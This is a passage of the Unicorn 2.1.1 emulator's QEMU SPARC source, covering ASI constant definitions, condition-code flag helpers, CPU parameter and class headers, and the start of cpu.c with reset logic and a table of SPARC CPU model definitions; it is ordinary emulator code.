ASI_UDBL_ERROR_R 0x7f /* External UDB error regs rd low */ #define ASI_UDBH_CONTROL_R 0x7f /* External UDB control regs rd hi */ #define ASI_UDBL_CONTROL_R 0x7f /* External UDB control regs rd low*/ #define ASI_INTR_R 0x7f /* IRQ vector dispatch read */ #define ASI_INTR_DATAN_R 0x7f /* (III) In irq vector data reg N */ #define ASI_PIC 0xb0 /* (NG4) PIC registers */ #define
ASI_PST8_P 0xc0 /* Primary, 8 8-bit, partial */ #define ASI_PST8_S 0xc1 /* Secondary, 8 8-bit, partial */ #define ASI_PST16_P 0xc2 /* Primary, 4 16-bit, partial */ #define ASI_PST16_S 0xc3 /* Secondary, 4 16-bit, partial */ #define ASI_PST32_P 0xc4 /* Primary, 2 32-bit, partial */ #define ASI_PST32_S 0xc5 /* Secondary, 2 32-bit, partial */ #define ASI_PST8_PL 0xc8 /* Primary, 8 8-bit, partial, L */ #define ASI_PST8_SL 0xc9 /* Secondary, 8 8-bit, partial, L */ #define ASI_PST16_PL 0xca /* Primary, 4 16-bit, partial, L */ #define ASI_PST16_SL 0xcb /* Secondary, 4 16-bit, partial, L */ #define ASI_PST32_PL 0xcc /* Primary, 2 32-bit, partial, L */ #define ASI_PST32_SL 0xcd /* Secondary, 2 32-bit, partial, L */ #define ASI_FL8_P 0xd0 /* Primary, 1 8-bit, fpu ld/st */ #define ASI_FL8_S 0xd1 /* Secondary, 1 8-bit, fpu ld/st */ #define ASI_FL16_P 0xd2 /* Primary, 1 16-bit, fpu ld/st */ #define ASI_FL16_S 0xd3 /* Secondary, 1 16-bit, fpu ld/st */ #define ASI_FL8_PL 0xd8 /* Primary, 1 8-bit, fpu ld/st, L */ #define ASI_FL8_SL 0xd9 /* Secondary, 1 8-bit, fpu ld/st, L*/ #define ASI_FL16_PL 0xda /* Primary, 1 16-bit, fpu ld/st, L */ #define ASI_FL16_SL 0xdb /* Secondary, 1 16-bit, fpu ld/st,L*/ #define ASI_BLK_COMMIT_P 0xe0 /* Primary, blk store commit */ #define ASI_BLK_COMMIT_S 0xe1 /* Secondary, blk store commit */ #define ASI_TWINX_P 0xe2 /* twin load, primary implicit */ #define ASI_BLK_INIT_QUAD_LDD_P 0xe2 /* (NG) init-store, twin load, * primary, implicit */ #define ASI_TWINX_S 0xe3 /* twin load, secondary implicit */ #define ASI_BLK_INIT_QUAD_LDD_S 0xe3 /* (NG) init-store, twin load, * secondary, implicit */ #define ASI_TWINX_PL 0xea /* twin load, primary implicit, LE */ #define ASI_TWINX_SL 0xeb /* twin load, secondary implicit, LE */ #define ASI_BLK_P 0xf0 /* Primary, blk ld/st */ #define ASI_BLK_S 0xf1 /* Secondary, blk ld/st */ #define ASI_ST_BLKINIT_MRU_P 0xf2 /* (NG4) init-store, twin load, * Most-Recently-Used, primary, * implicit */ #define ASI_ST_BLKINIT_MRU_S 0xf3 /* (NG4) init-store, twin load, * Most-Recently-Used, secondary, * implicit */ #define ASI_BLK_PL 0xf8 /* Primary, blk ld/st, little */ #define ASI_BLK_SL 0xf9 /* Secondary, blk ld/st, little */ #define ASI_ST_BLKINIT_MRU_PL 0xfa /* (NG4) init-store, twin load, * Most-Recently-Used, primary, * implicit, little-endian */ #define ASI_ST_BLKINIT_MRU_SL 0xfb /* (NG4) init-store, twin load, * Most-Recently-Used, secondary, * implicit, little-endian */ #endif /* SPARC_ASI_H */ unicorn-2.1.1/qemu/target/sparc/cc_helper.c /* * Helpers for lazy condition code handling * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version.
* * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" static uint32_t compute_all_flags(CPUSPARCState *env) { return env->psr & PSR_ICC; } static uint32_t compute_C_flags(CPUSPARCState *env) { return env->psr & PSR_CARRY; } static inline uint32_t get_NZ_icc(int32_t dst) { uint32_t ret = 0; if (dst == 0) { ret = PSR_ZERO; } else if (dst < 0) { ret = PSR_NEG; } return ret; } #ifdef TARGET_SPARC64 static uint32_t compute_all_flags_xcc(CPUSPARCState *env) { return env->xcc & PSR_ICC; } static uint32_t compute_C_flags_xcc(CPUSPARCState *env) { return env->xcc & PSR_CARRY; } static inline uint32_t get_NZ_xcc(target_long dst) { uint32_t ret = 0; if (!dst) { ret = PSR_ZERO; } else if (dst < 0) { ret = PSR_NEG; } return ret; } #endif static inline uint32_t get_V_div_icc(target_ulong src2) { uint32_t ret = 0; if (src2 != 0) { ret = PSR_OVF; } return ret; } static uint32_t compute_all_div(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_V_div_icc(CC_SRC2); return ret; } static uint32_t compute_C_div(CPUSPARCState *env) { return 0; } static inline uint32_t get_C_add_icc(uint32_t dst, uint32_t src1) { uint32_t ret = 0; if (dst < src1) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_C_addx_icc(uint32_t dst, uint32_t src1, uint32_t src2) { uint32_t ret = 0; if (((src1 & src2) | (~dst & (src1 | src2))) & (1U << 31)) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_V_add_icc(uint32_t dst, uint32_t src1, uint32_t src2) { uint32_t ret = 0; if (((src1 ^ src2 ^ -1) & (src1 ^ dst)) & (1U << 31)) { ret = PSR_OVF; } return ret; } #ifdef TARGET_SPARC64 static inline uint32_t get_C_add_xcc(target_ulong dst, target_ulong src1) { uint32_t ret = 0; if (dst < src1) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_C_addx_xcc(target_ulong dst, target_ulong src1, target_ulong src2) { uint32_t ret = 0; if (((src1 & src2) | (~dst & (src1 | src2))) & (1ULL << 63)) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_V_add_xcc(target_ulong dst, target_ulong src1, target_ulong src2) { uint32_t ret = 0; if (((src1 ^ src2 ^ -1) & (src1 ^ dst)) & (1ULL << 63)) { ret = PSR_OVF; } return ret; } static uint32_t compute_all_add_xcc(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_xcc(CC_DST); ret |= get_C_add_xcc(CC_DST, CC_SRC); ret |= get_V_add_xcc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_add_xcc(CPUSPARCState *env) { return get_C_add_xcc(CC_DST, CC_SRC); } #endif static uint32_t compute_all_add(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_add_icc(CC_DST, CC_SRC); ret |= get_V_add_icc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_add(CPUSPARCState *env) { return get_C_add_icc(CC_DST, CC_SRC); } #ifdef TARGET_SPARC64 static uint32_t compute_all_addx_xcc(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_xcc(CC_DST); ret |= get_C_addx_xcc(CC_DST, CC_SRC, CC_SRC2); ret |= get_V_add_xcc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_addx_xcc(CPUSPARCState *env) { return get_C_addx_xcc(CC_DST, CC_SRC, CC_SRC2); } #endif static uint32_t 
compute_all_addx(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_addx_icc(CC_DST, CC_SRC, CC_SRC2); ret |= get_V_add_icc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_addx(CPUSPARCState *env) { return get_C_addx_icc(CC_DST, CC_SRC, CC_SRC2); } static inline uint32_t get_V_tag_icc(target_ulong src1, target_ulong src2) { uint32_t ret = 0; if ((src1 | src2) & 0x3) { ret = PSR_OVF; } return ret; } static uint32_t compute_all_tadd(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_add_icc(CC_DST, CC_SRC); ret |= get_V_add_icc(CC_DST, CC_SRC, CC_SRC2); ret |= get_V_tag_icc(CC_SRC, CC_SRC2); return ret; } static uint32_t compute_all_taddtv(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_add_icc(CC_DST, CC_SRC); return ret; } static inline uint32_t get_C_sub_icc(uint32_t src1, uint32_t src2) { uint32_t ret = 0; if (src1 < src2) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_C_subx_icc(uint32_t dst, uint32_t src1, uint32_t src2) { uint32_t ret = 0; if (((~src1 & src2) | (dst & (~src1 | src2))) & (1U << 31)) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_V_sub_icc(uint32_t dst, uint32_t src1, uint32_t src2) { uint32_t ret = 0; if (((src1 ^ src2) & (src1 ^ dst)) & (1U << 31)) { ret = PSR_OVF; } return ret; } #ifdef TARGET_SPARC64 static inline uint32_t get_C_sub_xcc(target_ulong src1, target_ulong src2) { uint32_t ret = 0; if (src1 < src2) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_C_subx_xcc(target_ulong dst, target_ulong src1, target_ulong src2) { uint32_t ret = 0; if (((~src1 & src2) | (dst & (~src1 | src2))) & (1ULL << 63)) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_V_sub_xcc(target_ulong dst, target_ulong src1, target_ulong src2) { uint32_t ret = 0; if (((src1 ^ src2) & (src1 ^ dst)) & (1ULL << 63)) { ret = PSR_OVF; } return ret; } static uint32_t compute_all_sub_xcc(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_xcc(CC_DST); ret |= get_C_sub_xcc(CC_SRC, CC_SRC2); ret |= get_V_sub_xcc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_sub_xcc(CPUSPARCState *env) { return get_C_sub_xcc(CC_SRC, CC_SRC2); } #endif static uint32_t compute_all_sub(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_sub_icc(CC_SRC, CC_SRC2); ret |= get_V_sub_icc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_sub(CPUSPARCState *env) { return get_C_sub_icc(CC_SRC, CC_SRC2); } #ifdef TARGET_SPARC64 static uint32_t compute_all_subx_xcc(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_xcc(CC_DST); ret |= get_C_subx_xcc(CC_DST, CC_SRC, CC_SRC2); ret |= get_V_sub_xcc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_subx_xcc(CPUSPARCState *env) { return get_C_subx_xcc(CC_DST, CC_SRC, CC_SRC2); } #endif static uint32_t compute_all_subx(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_subx_icc(CC_DST, CC_SRC, CC_SRC2); ret |= get_V_sub_icc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_subx(CPUSPARCState *env) { return get_C_subx_icc(CC_DST, CC_SRC, CC_SRC2); } static uint32_t compute_all_tsub(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_sub_icc(CC_SRC, CC_SRC2); ret |= get_V_sub_icc(CC_DST, CC_SRC, CC_SRC2); ret |= get_V_tag_icc(CC_SRC, CC_SRC2); return ret; } static uint32_t compute_all_tsubtv(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_sub_icc(CC_SRC, CC_SRC2); return ret; } static 
uint32_t compute_all_logic(CPUSPARCState *env)
{
    return get_NZ_icc(CC_DST);
}

static uint32_t compute_C_logic(CPUSPARCState *env)
{
    return 0;
}

#ifdef TARGET_SPARC64
static uint32_t compute_all_logic_xcc(CPUSPARCState *env)
{
    return get_NZ_xcc(CC_DST);
}
#endif

typedef struct CCTable {
    uint32_t (*compute_all)(CPUSPARCState *env); /* return all the flags */
    uint32_t (*compute_c)(CPUSPARCState *env);   /* return the C flag */
} CCTable;

static const CCTable icc_table[CC_OP_NB] = {
    /* CC_OP_DYNAMIC should never happen */
    [CC_OP_FLAGS] = { compute_all_flags, compute_C_flags },
    [CC_OP_DIV] = { compute_all_div, compute_C_div },
    [CC_OP_ADD] = { compute_all_add, compute_C_add },
    [CC_OP_ADDX] = { compute_all_addx, compute_C_addx },
    [CC_OP_TADD] = { compute_all_tadd, compute_C_add },
    [CC_OP_TADDTV] = { compute_all_taddtv, compute_C_add },
    [CC_OP_SUB] = { compute_all_sub, compute_C_sub },
    [CC_OP_SUBX] = { compute_all_subx, compute_C_subx },
    [CC_OP_TSUB] = { compute_all_tsub, compute_C_sub },
    [CC_OP_TSUBTV] = { compute_all_tsubtv, compute_C_sub },
    [CC_OP_LOGIC] = { compute_all_logic, compute_C_logic },
};

#ifdef TARGET_SPARC64
static const CCTable xcc_table[CC_OP_NB] = {
    /* CC_OP_DYNAMIC should never happen */
    [CC_OP_FLAGS] = { compute_all_flags_xcc, compute_C_flags_xcc },
    [CC_OP_DIV] = { compute_all_logic_xcc, compute_C_logic },
    [CC_OP_ADD] = { compute_all_add_xcc, compute_C_add_xcc },
    [CC_OP_ADDX] = { compute_all_addx_xcc, compute_C_addx_xcc },
    [CC_OP_TADD] = { compute_all_add_xcc, compute_C_add_xcc },
    [CC_OP_TADDTV] = { compute_all_add_xcc, compute_C_add_xcc },
    [CC_OP_SUB] = { compute_all_sub_xcc, compute_C_sub_xcc },
    [CC_OP_SUBX] = { compute_all_subx_xcc, compute_C_subx_xcc },
    [CC_OP_TSUB] = { compute_all_sub_xcc, compute_C_sub_xcc },
    [CC_OP_TSUBTV] = { compute_all_sub_xcc, compute_C_sub_xcc },
    [CC_OP_LOGIC] = { compute_all_logic_xcc, compute_C_logic },
};
#endif

void helper_compute_psr(CPUSPARCState *env)
{
    uint32_t new_psr;

    new_psr = icc_table[CC_OP].compute_all(env);
    env->psr = new_psr;
#ifdef TARGET_SPARC64
    new_psr = xcc_table[CC_OP].compute_all(env);
    env->xcc = new_psr;
#endif
    CC_OP = CC_OP_FLAGS;
}

uint32_t helper_compute_C_icc(CPUSPARCState *env)
{
    return icc_table[CC_OP].compute_c(env) >> PSR_CARRY_SHIFT;
}

unicorn-2.1.1/qemu/target/sparc/cpu-param.h

/*
 * Sparc cpu parameters for qemu.
 *
 * SPDX-License-Identifier: LGPL-2.0+
 */

#ifndef SPARC_CPU_PARAM_H
#define SPARC_CPU_PARAM_H 1

#ifdef TARGET_SPARC64
# define TARGET_LONG_BITS 64
# define TARGET_PAGE_BITS 13 /* 8k */
# define TARGET_PHYS_ADDR_SPACE_BITS 41
# ifdef TARGET_ABI32
#  define TARGET_VIRT_ADDR_SPACE_BITS 32
# else
#  define TARGET_VIRT_ADDR_SPACE_BITS 44
# endif
# define NB_MMU_MODES 6
#else
# define TARGET_LONG_BITS 32
# define TARGET_PAGE_BITS 12 /* 4k */
# define TARGET_PHYS_ADDR_SPACE_BITS 36
# define TARGET_VIRT_ADDR_SPACE_BITS 32
# define NB_MMU_MODES 3
#endif

#endif

unicorn-2.1.1/qemu/target/sparc/cpu-qom.h

/*
 * QEMU SPARC CPU
 *
 * Copyright (c) 2012 SUSE LINUX Products GmbH
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see
 * <http://www.gnu.org/licenses/lgpl-2.1.html>
 */

#ifndef QEMU_SPARC_CPU_QOM_H
#define QEMU_SPARC_CPU_QOM_H

#include "hw/core/cpu.h"

#define SPARC_CPU(obj) ((SPARCCPU *)obj)
#define SPARC_CPU_CLASS(klass) ((SPARCCPUClass *)klass)
#define SPARC_CPU_GET_CLASS(obj) (&((SPARCCPU *)obj)->cc)

typedef struct sparc_def_t sparc_def_t;

/**
 * SPARCCPUClass:
 * @parent_realize: The parent class' realize handler.
 * @parent_reset: The parent class' reset handler.
 *
 * A SPARC CPU model.
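 *
 * Editorial note (not in the original header): in Unicorn's flattened
 * QOM, the class object is embedded directly inside SPARCCPU, which is
 * why SPARC_CPU_GET_CLASS() above is a plain field access on obj->cc
 * rather than a type-checked QOM cast.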
 */
typedef struct SPARCCPUClass {
    /*< private >*/
    CPUClass parent_class;
    /*< public >*/

    void (*parent_reset)(CPUState *cpu);
    const sparc_def_t *cpu_def;
} SPARCCPUClass;

typedef struct SPARCCPU SPARCCPU;

#endif

unicorn-2.1.1/qemu/target/sparc/cpu.c

/*
 * Sparc CPU init helpers
 *
 * Copyright (c) 2003-2005 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/exec-all.h"

static void sparc_cpu_reset(CPUState *dev)
{
    CPUState *s = CPU(dev);
    SPARCCPU *cpu = SPARC_CPU(s);
    SPARCCPUClass *scc = SPARC_CPU_GET_CLASS(cpu);
    CPUSPARCState *env = &cpu->env;

    scc->parent_reset(dev);

    memset(env, 0, offsetof(CPUSPARCState, end_reset_fields));
    env->cwp = 0;
#ifndef TARGET_SPARC64
    env->wim = 1;
#endif
    env->regwptr = env->regbase + (env->cwp * 16);
    CC_OP = CC_OP_FLAGS;
#if !defined(TARGET_SPARC64)
    env->psret = 0;
    env->psrs = 1;
    env->psrps = 1;
#endif
#ifdef TARGET_SPARC64
    env->pstate = PS_PRIV | PS_RED | PS_PEF;
    if (!cpu_has_hypervisor(env)) {
        env->pstate |= PS_AG;
    }
    env->hpstate = cpu_has_hypervisor(env) ?
HS_PRIV : 0; env->tl = env->maxtl; env->gl = 2; cpu_tsptr(env)->tt = TT_POWER_ON_RESET; env->lsu = 0; #else env->mmuregs[0] &= ~(MMU_E | MMU_NF); env->mmuregs[0] |= env->def.mmu_bm; #endif env->pc = 0; env->npc = env->pc + 4; env->cache_control = 0; } static bool sparc_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { if (interrupt_request & CPU_INTERRUPT_HARD) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; if (cpu_interrupts_enabled(env) && env->interrupt_index > 0) { int pil = env->interrupt_index & 0xf; int type = env->interrupt_index & 0xf0; if (type != TT_EXTINT || cpu_pil_allowed(env, pil)) { cs->exception_index = env->interrupt_index; sparc_cpu_do_interrupt(cs); return true; } } } return false; } void cpu_sparc_set_id(CPUSPARCState *env, unsigned int cpu) { #if !defined(TARGET_SPARC64) env->mxccregs[7] = ((cpu + 8) & 0xf) << 24; #endif } static const sparc_def_t sparc_defs[] = { #ifdef TARGET_SPARC64 { .name = "Fujitsu Sparc64", .iu_version = ((0x04ULL << 48) | (0x02ULL << 32) | (0ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 4, .maxtl = 4, .features = CPU_DEFAULT_FEATURES, }, { .name = "Fujitsu Sparc64 III", .iu_version = ((0x04ULL << 48) | (0x03ULL << 32) | (0ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 5, .maxtl = 4, .features = CPU_DEFAULT_FEATURES, }, { .name = "Fujitsu Sparc64 IV", .iu_version = ((0x04ULL << 48) | (0x04ULL << 32) | (0ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "Fujitsu Sparc64 V", .iu_version = ((0x04ULL << 48) | (0x05ULL << 32) | (0x51ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI UltraSparc I", .iu_version = ((0x17ULL << 48) | (0x10ULL << 32) | (0x40ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI UltraSparc II", .iu_version = ((0x17ULL << 48) | (0x11ULL << 32) | (0x20ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI UltraSparc IIi", .iu_version = ((0x17ULL << 48) | (0x12ULL << 32) | (0x91ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI UltraSparc IIe", .iu_version = ((0x17ULL << 48) | (0x13ULL << 32) | (0x14ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "Sun UltraSparc III", .iu_version = ((0x3eULL << 48) | (0x14ULL << 32) | (0x34ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "Sun UltraSparc III Cu", .iu_version = ((0x3eULL << 48) | (0x15ULL << 32) | (0x41ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_3, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "Sun UltraSparc IIIi", .iu_version = ((0x3eULL << 48) | (0x16ULL << 32) | (0x34ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "Sun UltraSparc IV", .iu_version = ((0x3eULL << 48) | (0x18ULL << 32) | (0x31ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_4, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = 
"Sun UltraSparc IV+", .iu_version = ((0x3eULL << 48) | (0x19ULL << 32) | (0x22ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES | CPU_FEATURE_CMT, }, { .name = "Sun UltraSparc IIIi+", .iu_version = ((0x3eULL << 48) | (0x22ULL << 32) | (0ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_3, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, { .name = "Sun UltraSparc T1", /* defined in sparc_ifu_fdp.v and ctu.h */ .iu_version = ((0x3eULL << 48) | (0x23ULL << 32) | (0x02ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_sun4v, .nwindows = 8, .maxtl = 6, .features = CPU_DEFAULT_FEATURES | CPU_FEATURE_HYPV | CPU_FEATURE_CMT | CPU_FEATURE_GL, }, { .name = "Sun UltraSparc T2", /* defined in tlu_asi_ctl.v and n2_revid_cust.v */ .iu_version = ((0x3eULL << 48) | (0x24ULL << 32) | (0x02ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_sun4v, .nwindows = 8, .maxtl = 6, .features = CPU_DEFAULT_FEATURES | CPU_FEATURE_HYPV | CPU_FEATURE_CMT | CPU_FEATURE_GL, }, { .name = "NEC UltraSparc I", .iu_version = ((0x22ULL << 48) | (0x10ULL << 32) | (0x40ULL << 24)), .fpu_version = 0x00000000, .mmu_version = mmu_us_12, .nwindows = 8, .maxtl = 5, .features = CPU_DEFAULT_FEATURES, }, #else { .name = "Fujitsu MB86904", .iu_version = 0x04 << 24, /* Impl 0, ver 4 */ .fpu_version = 4 << 17, /* FPU version 4 (Meiko) */ .mmu_version = 0x04 << 24, /* Impl 0, ver 4 */ .mmu_bm = 0x00004000, .mmu_ctpr_mask = 0x00ffffc0, .mmu_cxr_mask = 0x000000ff, .mmu_sfsr_mask = 0x00016fff, .mmu_trcr_mask = 0x00ffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "Fujitsu MB86907", .iu_version = 0x05 << 24, /* Impl 0, ver 5 */ .fpu_version = 4 << 17, /* FPU version 4 (Meiko) */ .mmu_version = 0x05 << 24, /* Impl 0, ver 5 */ .mmu_bm = 0x00004000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x000000ff, .mmu_sfsr_mask = 0x00016fff, .mmu_trcr_mask = 0xffffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI MicroSparc I", .iu_version = 0x41000000, .fpu_version = 4 << 17, .mmu_version = 0x41000000, .mmu_bm = 0x00004000, .mmu_ctpr_mask = 0x007ffff0, .mmu_cxr_mask = 0x0000003f, .mmu_sfsr_mask = 0x00016fff, .mmu_trcr_mask = 0x0000003f, .nwindows = 7, .features = CPU_FEATURE_FLOAT | CPU_FEATURE_SWAP | CPU_FEATURE_MUL | CPU_FEATURE_DIV | CPU_FEATURE_FLUSH | CPU_FEATURE_FSQRT | CPU_FEATURE_FMUL, }, { .name = "TI MicroSparc II", .iu_version = 0x42000000, .fpu_version = 4 << 17, .mmu_version = 0x02000000, .mmu_bm = 0x00004000, .mmu_ctpr_mask = 0x00ffffc0, .mmu_cxr_mask = 0x000000ff, .mmu_sfsr_mask = 0x00016fff, .mmu_trcr_mask = 0x00ffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI MicroSparc IIep", .iu_version = 0x42000000, .fpu_version = 4 << 17, .mmu_version = 0x04000000, .mmu_bm = 0x00004000, .mmu_ctpr_mask = 0x00ffffc0, .mmu_cxr_mask = 0x000000ff, .mmu_sfsr_mask = 0x00016bff, .mmu_trcr_mask = 0x00ffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI SuperSparc 40", /* STP1020NPGA */ .iu_version = 0x41000000, /* SuperSPARC 2.x */ .fpu_version = 0 << 17, .mmu_version = 0x00000800, /* SuperSPARC 2.x, no MXCC */ .mmu_bm = 0x00002000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x0000ffff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI SuperSparc 50", /* STP1020PGA */ .iu_version = 0x40000000, /* SuperSPARC 3.x */ .fpu_version = 0 << 17, .mmu_version = 0x01000800, /* SuperSPARC 3.x, 
no MXCC */ .mmu_bm = 0x00002000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x0000ffff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI SuperSparc 51", .iu_version = 0x40000000, /* SuperSPARC 3.x */ .fpu_version = 0 << 17, .mmu_version = 0x01000000, /* SuperSPARC 3.x, MXCC */ .mmu_bm = 0x00002000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x0000ffff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .mxcc_version = 0x00000104, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI SuperSparc 60", /* STP1020APGA */ .iu_version = 0x40000000, /* SuperSPARC 3.x */ .fpu_version = 0 << 17, .mmu_version = 0x01000800, /* SuperSPARC 3.x, no MXCC */ .mmu_bm = 0x00002000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x0000ffff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI SuperSparc 61", .iu_version = 0x44000000, /* SuperSPARC 3.x */ .fpu_version = 0 << 17, .mmu_version = 0x01000000, /* SuperSPARC 3.x, MXCC */ .mmu_bm = 0x00002000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x0000ffff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .mxcc_version = 0x00000104, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "TI SuperSparc II", .iu_version = 0x40000000, /* SuperSPARC II 1.x */ .fpu_version = 0 << 17, .mmu_version = 0x08000000, /* SuperSPARC II 1.x, MXCC */ .mmu_bm = 0x00002000, .mmu_ctpr_mask = 0xffffffc0, .mmu_cxr_mask = 0x0000ffff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .mxcc_version = 0x00000104, .nwindows = 8, .features = CPU_DEFAULT_FEATURES, }, { .name = "LEON2", .iu_version = 0xf2000000, .fpu_version = 4 << 17, /* FPU version 4 (Meiko) */ .mmu_version = 0xf2000000, .mmu_bm = 0x00004000, .mmu_ctpr_mask = 0x007ffff0, .mmu_cxr_mask = 0x0000003f, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES | CPU_FEATURE_TA0_SHUTDOWN, }, { .name = "LEON3", .iu_version = 0xf3000000, .fpu_version = 4 << 17, /* FPU version 4 (Meiko) */ .mmu_version = 0xf3000000, .mmu_bm = 0x00000000, .mmu_ctpr_mask = 0xfffffffc, .mmu_cxr_mask = 